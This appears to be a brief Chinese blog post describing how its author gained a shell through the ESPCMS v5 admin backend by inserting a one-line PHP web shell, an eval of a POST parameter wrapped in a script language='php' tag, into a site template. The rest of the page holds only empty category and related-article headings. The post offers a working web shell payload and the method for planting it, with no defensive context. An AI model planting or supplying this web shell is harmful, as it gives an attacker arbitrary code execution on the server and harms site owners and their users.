devi1o

今天在espcms v5后台getshell时发现,可以在模板中插入如下代码,成功执行PHP。

 

<script language="php">eval($_POST[c])</script>

分类:

技术点:

相关文章: